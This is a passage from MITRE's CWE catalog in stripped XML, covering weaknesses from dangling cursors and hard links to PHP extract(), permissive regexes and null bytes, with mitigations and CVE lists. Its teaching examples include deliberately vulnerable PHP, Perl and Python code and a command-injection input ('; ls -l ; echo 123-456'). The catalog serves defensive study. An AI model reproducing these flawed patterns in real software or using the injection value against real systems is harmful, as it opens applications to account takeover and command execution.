"sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + If you must expose a method, make sure to perform input validation on all arguments, and protect against all possible vulnerabilities. + + + Architecture and Design + Use code signing, although this does not protect against any weaknesses that are already in the control. + + + Architecture and Design + System Configuration + Where possible, avoid marking the control as safe for scripting. + + + + + CVE-2007-1120 + download a file to arbitrary folders. + https://www.cve.org/CVERecord?id=CVE-2007-1120 + + + CVE-2006-6838 + control downloads and executes a url in a parameter + https://www.cve.org/CVERecord?id=CVE-2006-6838 + + + CVE-2007-0321 + resultant buffer overflow + https://www.cve.org/CVERecord?id=CVE-2007-0321 + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor "dangling." + For example, an improper dangling cursor could arise from unhandled exceptions. The impact of the issue depends on the cursor's role, but SQL injection attacks are commonly possible. + + + + + + Primary + This could be primary when the programmer never attempts to close the cursor when finished with it. + + + Resultant + + + + + + + A cursor is a feature in Oracle PL/SQL and other languages that provides a handle for executing and accessing the results of SQL queries. + + + + Implementation + This issue is currently reported for unhandled exceptions, but it is theoretically possible any time the programmer does not close the cursor at the proper time. + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + Implementation + Close cursors immediately after access to them is complete. Ensure that you close cursors if exceptions occur. + + + + + SFP24 + Tainted input to command + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-10-14 + updated Background_Details, Description, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Modes_of_Introduction, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Dangling Database Cursor (Cursor Injection) + Dangling Database Cursor (aka 'Cursor Injection') + + + + The product, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files. + Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. /etc/passwd). When the process opens the file, the attacker can assume the privileges of that process. + + + + + + Resultant + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Architecture and Design + Separation of Privilege + + Follow the principle of least privilege when assigning access rights to entities in a software system. + Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. + + + + + + CVE-2001-1494 + Hard link attack, file overwrite; interesting because program checks against soft links + https://www.cve.org/CVERecord?id=CVE-2001-1494 + + + CVE-2002-0793 + Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2002-0793 + + + CVE-2003-0578 + Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2003-0578 + + + CVE-1999-0783 + Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system. + https://www.cve.org/CVERecord?id=CVE-1999-0783 + + + CVE-2004-1603 + Web hosting manager follows hard links, which allows local users to read or modify arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2004-1603 + + + CVE-2004-1901 + Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles. + https://www.cve.org/CVERecord?id=CVE-2004-1901 + + + CVE-2005-0342 + The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file. + https://www.cve.org/CVERecord?id=CVE-2005-0342 + + + CVE-2005-1111 + Hard link race condition + https://www.cve.org/CVERecord?id=CVE-2005-1111 + + + CVE-2021-21272 + "Zip Slip" vulnerability in Go-based Open Container Initiative (OCI) registries product allows writing arbitrary files outside intended directory via symbolic links or hard links in a gzipped tarball. + https://www.cve.org/CVERecord?id=CVE-2021-21272 + + + BUGTRAQ:20030203 ASA-0001 + OpenBSD chpass/chfn/chsh file content leak + http://www.securityfocus.com/archive/1/309962 + + + + + UNIX hard link + + + FIO05-C + Identify files using multiple file attributes + + + SFP18 + Link in resource name resolution + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication. + This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user. + + + + + + Primary + + + Resultant + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + + + + + Architecture and Design + When prompting for a password change, force the user to provide the original password in addition to the new password. + + + Architecture and Design + Do not use "forgotten password" functionality. But if you must, ensure that you are only providing information to the actual user, e.g. by using an email address or challenge question that the legitimate user already provided in the past; do not allow the current user to change this identity information until the correct password has been provided. + + + + + This code changes a user's password. + + $user = $_GET['user'];$pass = $_GET['pass'];$checkpass = $_GET['checkpass'];if ($pass == $checkpass) {SetUserPassword($user, $pass);} + + While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user's password and gain control of the victim's account. + + + + + CVE-2007-0681 + Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions. + https://www.cve.org/CVERecord?id=CVE-2007-0681 + + + CVE-2000-0944 + Web application password change utility doesn't check the original password. + https://www.cve.org/CVERecord?id=CVE-2000-0944 + + + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + SFP31 + Missing authentication + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables. + + For example, in PHP, extraction can be used to provide functionality similar to register_globals, a dangerous functionality that is frequently disabled in production systems. Calling extract() or import_request_variables() without the proper arguments could allow arbitrary global variables to be overwritten, including superglobals. + Similar functionality is possible in other interpreted languages, including custom languages. + + + + + + + + Primary + + + + + + + + Variable overwrite + + + + + Implementation + + + + + Integrity + Modify Application Data + An attacker could modify sensitive data or program variables. + + + + + Implementation + Input Validation + Use allowlists of variable names that can be extracted. + + + Implementation + Consider refactoring your code to avoid extraction routines altogether. + + + Implementation + In PHP, call extract() with options such as EXTR_SKIP and EXTR_PREFIX_ALL; call import_request_variables() with a prefix argument. Note that these capabilities are not present in all PHP versions. + + + + + This code uses the credentials sent in a POST request to login a user. + + + //Log user in, and set $isAdmin to true if user is an administrator + + function login($user,$pass){$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == "Admin"){$isAdmin = true;}} + $isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass)); + + The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value "isAdmin" equal to "true", thus gaining Admin privileges. + + + + + CVE-2006-7135 + extract issue enables file inclusion + https://www.cve.org/CVERecord?id=CVE-2006-7135 + + + CVE-2006-7079 + extract used for register_globals compatibility layer, enables path traversal + https://www.cve.org/CVERecord?id=CVE-2006-7079 + + + CVE-2007-0649 + extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect. + https://www.cve.org/CVERecord?id=CVE-2007-0649 + + + CVE-2006-6661 + extract() enables static code injection + https://www.cve.org/CVERecord?id=CVE-2006-6661 + + + CVE-2006-2828 + import_request_variables() buried in include files makes post-disclosure analysis confusing + https://www.cve.org/CVERecord?id=CVE-2006-2828 + + + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Probably under-reported for PHP. Seems under-studied for other interpreted languages. + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities. + Such hooks can be used in defensive software that runs with privileges, such as anti-virus or firewall, which hooks kernel calls. When the arguments are not validated, they could be used to bypass the protection scheme or attack the product itself. + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Architecture and Design + Ensure that all arguments are verified, as defined by the API you are protecting. + + + Architecture and Design + Drop privileges before invoking such functions, if possible. + + + + + CVE-2007-0708 + DoS in firewall using standard Microsoft functions + https://www.cve.org/CVERecord?id=CVE-2007-0708 + + + CVE-2006-7160 + DoS in firewall using standard Microsoft functions + https://www.cve.org/CVERecord?id=CVE-2006-7160 + + + CVE-2007-1376 + function does not verify that its argument is the proper type, leading to arbitrary memory write + https://www.cve.org/CVERecord?id=CVE-2007-1376 + + + CVE-2007-1220 + invalid syscall arguments bypass code execution limits + https://www.cve.org/CVERecord?id=CVE-2007-1220 + + + CVE-2006-4541 + DoS in IDS via NULL argument + https://www.cve.org/CVERecord?id=CVE-2006-4541 + + + + + SFP27 + Tainted input to environment + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unvalidated Function Hook Arguments + + + + An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting. + This might allow attackers to use dangerous functionality via a web page that accesses the control, which can lead to different resultant vulnerabilities, depending on the control's behavior. + + + + + + + Primary + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Architecture and Design + During development, do not mark it as safe for scripting. + + + System Configuration + After distribution, you can set the kill bit for the control so that it is not accessible from Internet Explorer. + + + + + CVE-2007-0617 + control allows attackers to add malicious email addresses to bypass spam limits + https://www.cve.org/CVERecord?id=CVE-2007-0617 + + + CVE-2007-0219 + web browser uses certain COM objects as ActiveX + https://www.cve.org/CVERecord?id=CVE-2007-0219 + + + CVE-2006-6510 + kiosk allows bypass to read files + https://www.cve.org/CVERecord?id=CVE-2006-6510 + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Observed_Example, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers. + Case (2) is possible in the PHP preg_replace() function, and possibly in other languages when a user-controlled input is inserted into a string that is later parsed as a regular expression. + + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Implementation + The regular expression feature in some languages allows inputs to be quoted or escaped before insertion, such as \Q and \E in Perl. + + + + + CVE-2006-2059 + Executable regexp in PHP by inserting "e" modifier into first argument to preg_replace + https://www.cve.org/CVERecord?id=CVE-2006-2059 + + + CVE-2005-3420 + Executable regexp in PHP by inserting "e" modifier into first argument to preg_replace + https://www.cve.org/CVERecord?id=CVE-2005-3420 + + + CVE-2006-2878 + Complex curly syntax inserted into the replacement argument to PHP preg_replace(), which uses the "/e" modifier + https://www.cve.org/CVERecord?id=CVE-2006-2878 + + + CVE-2006-2908 + Function allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier. + https://www.cve.org/CVERecord?id=CVE-2006-2908 + + + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. The existing PHP reports are limited to highly skilled researchers, but there are few examples for other languages. It is suspected that this is under-reported for all languages. Usability factors might make it more prevalent in PHP, but this theory has not been investigated. + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Observed_Example + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a regular expression that does not sufficiently restrict the set of allowed values. + + This effectively causes the regexp to accept substrings that match the pattern, which produces a partial comparison to the target. In some cases, this can lead to other weaknesses. Common errors include: + + not identifying the beginning and end of the target string + using wildcards instead of acceptable character ranges + others + + + + + + + + + + + Primary + + + + + + + + + Implementation + This problem is frequently found when the regular expression is used in input validation or security features such as authentication. + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + When applicable, ensure that the regular expression marks beginning and ending string patterns, such as "/^string$/" for Perl. + + + + + The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers. + + $phone = GetPhoneNumber();if ($phone =~ /\d+-\d+/) { + # looks like it only has hyphens and digits + system("lookup-phone $phone");} + else {error("malformed number!");} + + An attacker could provide an argument such as: "; ls -l ; echo 123-456" This would pass the check, since "123-456" is sufficient to match the "\d+-\d+" portion of the regular expression. + + + This code uses a regular expression to validate an IP string prior to using it in a call to the "ping" command. + + + import subprocess + import re + + def validate_ip_regex(ip: str): + + ip_validator = re.compile(r"((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}") + if ip_validator.match(ip): + + return ip + + else: + + raise ValueError("IP address does not match valid pattern.") + + + + def run_ping_regex(ip: str): + + validated = validate_ip_regex(ip) + # The ping command treats zero-prepended IP addresses as octal + result = subprocess.call(["ping", validated]) + print(result) + + + + Since the regular expression does not have anchors (CWE-777), i.e. is unbounded without ^ or $ characters, then prepending a 0 or 0x to the beginning of the IP address will still result in a matched regex pattern. Since the ping command supports octal and hex prepended IP addresses, it will use the unexpectedly valid IP address (CWE-1389). For example, "0x63.63.63.63" would be considered equivalent to "99.63.63.63". As a result, the attacker could potentially ping systems that the attacker cannot reach directly. + + + + + CVE-2021-22204 + Chain: regex in EXIF processor code does not correctly determine where a string ends (CWE-625), enabling eval injection (CWE-95), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-22204 + + + CVE-2006-1895 + ".*" regexp leads to static code injection + https://www.cve.org/CVERecord?id=CVE-2006-1895 + + + CVE-2002-2175 + insertion of username into regexp results in partial comparison, causing wrong database entry to be updated when one username is a substring of another. + https://www.cve.org/CVERecord?id=CVE-2002-2175 + + + CVE-2006-4527 + regexp intended to verify that all characters are legal, only checks that at least one is legal, enabling file inclusion. + https://www.cve.org/CVERecord?id=CVE-2006-4527 + + + CVE-2005-1949 + Regexp for IP address isn't anchored at the end, allowing appending of shell metacharacters. + https://www.cve.org/CVERecord?id=CVE-2005-1949 + + + CVE-2002-2109 + Regexp isn't "anchored" to the beginning or end, which allows spoofed values that have trusted values as substrings. + https://www.cve.org/CVERecord?id=CVE-2002-2109 + + + CVE-2006-6511 + regexp in .htaccess file allows access of files whose names contain certain substrings + https://www.cve.org/CVERecord?id=CVE-2006-6511 + + + CVE-2006-6629 + allow load of macro files whose names contain certain substrings. + https://www.cve.org/CVERecord?id=CVE-2006-6629 + + + + + IDS08-J + Sanitize untrusted data passed to a regex + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly handle null bytes or NUL characters when passing data between different representations or components. + + A null byte (NUL character) can have different meanings across representations or languages. For example, it is a string terminator in standard C libraries, but Perl and PHP strings do not treat it as a terminator. When two representations are crossed - such as when Perl or PHP invokes underlying C functionality - this can produce an interaction error with unexpected results. Similar issues have been reported for ASP. Other interpreters written in C might also be affected. + The poison null byte is frequently useful in path traversal attacks by terminating hard-coded extensions that are added to a filename. It can play a role in regular expression processing in PHP. + + + + + + + + Primary + + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Implementation + Remove null bytes from all incoming strings. + + + + + CVE-2005-4155 + NUL byte bypasses PHP regular expression check + https://www.cve.org/CVERecord?id=CVE-2005-4155 + + + CVE-2005-3153 + inserting SQL after a NUL byte bypasses allowlist regexp, enabling SQL injection + https://www.cve.org/CVERecord?id=CVE-2005-3153 + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Current usage of "poison null byte" is typically related to this C/Perl/PHP interaction error, but the original term in 1998 was applied to an off-by-one buffer overflow involving a null byte. + There are not many CVE examples, because the poison NULL byte is a design limitation, which typically is not included in CVE by itself. It is typically used as a facilitator manipulation to widen the scope of potential attacks against other vulnerabilities. + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes, Research_Gaps, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions. + The resultant vulnerabilities depend on the behavior of the application, both at the crossover point and in any control/data flow that is reachable by the related variables or functions. + + + + + + + Primary + + + + + + + + Many interpreted languages support the use of a "$$varname" construct to set a variable whose name is specified by the $varname variable. In PHP, these are referred to as "variable variables." Functions might also be invoked using similar syntax, such as $$funcname(arg1, arg2). + + + + Dynamic evaluation + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Modify Application Data + Execute Unauthorized Code or Commands + An attacker could gain unauthorized access to internal program variables and execute 